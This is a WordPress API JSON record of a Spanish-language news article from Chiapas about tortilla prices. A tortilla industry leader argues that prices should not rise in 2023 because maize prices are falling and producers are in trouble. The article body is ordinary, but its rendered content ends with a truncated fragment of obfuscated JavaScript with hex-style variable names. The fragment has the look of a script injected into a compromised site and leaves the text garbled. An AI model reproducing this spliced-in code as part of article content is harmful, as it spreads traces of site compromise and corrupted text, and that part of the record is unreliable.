{"id":10236,"date":"2023-05-29T00:24:25","date_gmt":"2023-05-29T00:24:25","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10236"},"modified":"2023-05-29T00:24:26","modified_gmt":"2023-05-29T00:24:26","slug":"precio-de-la-tortilla-no-deberia-subir-de-precio-en-este-2023","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10236","title":{"rendered":"Precio de la tortilla no deber\u00eda subir de precio en este 2023"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"740\" height=\"431\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685319847414.jpg\" alt=\"\" class=\"wp-image-10237\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685319847414.jpg 740w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1685319847414-300x175.jpg 300w\" sizes=\"auto, (max-width: 740px) 100vw, 740px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>28 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Jos\u00e9 Ram\u00f3n Salazar Ballinas, presidente del grupo de Industriales de la Masa y la Tortilla \u201cSomos Chiapas\u201d, consider\u00f3 que, el precio de la tortilla no deber\u00eda sufrir un incremento m\u00e1s en este 2023.<\/p>\n\n\n\n<p>Expuso que, actualmente existe un grave problema con los productores de ma\u00edz del Norte del Pa\u00eds, ya que SEGALMEX va a comprar a penas un mill\u00f3n de toneladas, cuando hay seis millones de toneladas.<\/p>\n\n\n\n<p>\u201cEl gobierno no sabe ni qu\u00e9 hacer, a pesar de que, el precio internacional del ma\u00edz est\u00e1 a la baja, por ello no habr\u00eda ninguna justificaci\u00f3n de las harineras para incrementar su precio\u201d, dijo.<\/p>\n\n\n\n<p>La preocupaci\u00f3n de los tortilleros del pa\u00eds, incluyendo a Chiapas es con los productores de ma\u00edz y trigo de Sinaloa, en donde el problema es precisamente que no les van a comprar el producto, por ello han tomado instalaciones de PEMEX, han realizado bloqueos etc.<\/p>\n\n\n\n<p>Para Chiapas no habr\u00eda afectaci\u00f3n en cuanto al costo de la tortilla, \u201cel gran detalle es que, en el estado se ha dejado de producir ma\u00edz y eso a la larga ser\u00e1 un grave problema\u201d.<\/p>\n\n\n\n<p>Es por ello que, una petici\u00f3n que, han realizado los tortilleros a las autoridades estatales es que, exista una vinculaci\u00f3n directa con los tortilleros, con lo que se estar\u00eda combatiendo el coyotaje.<\/p>\n\n\n\n<p>\u201cEl problema es que no tenemos suficiente liquidez, para comprar en volumen pero el gobierno s\u00ed lo tiene y podr\u00eda hacer algo al respecto\u201d, agreg\u00f3.<\/p>\n\n\n\n<p>Cit\u00f3 el caso de Guerrero en que, la gobernadora intervino para que, los productores y tortilleros se vieran beneficiados con la compra y venta del producto.<\/p>\n\n\n\n<p>En la entidad, tambi\u00e9n existe la diferencia que se usa harina de ma\u00edz para la elaboraci\u00f3n de la tortilla, por ello, hasta cierto punto le beneficia al no haber alza en el costo de la tonelada.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 28 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Jos\u00e9 Ram\u00f3n Salazar Ballinas, presidente del grupo de Industriales de la Masa y la Tortilla \u201cSomos Chiapas\u201d, consider\u00f3 que, el precio de la tortilla no deber\u00eda sufrir un incremento m\u00e1s en este 2023. Expuso que, actualmente existe un grave problema con los productores de ma\u00edz del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10237,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10236","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10236","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10236"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10236\/revisions"}],"predecessor-version":[{"id":10238,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10236\/revisions\/10238"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10237"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10236"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10236"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10236"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}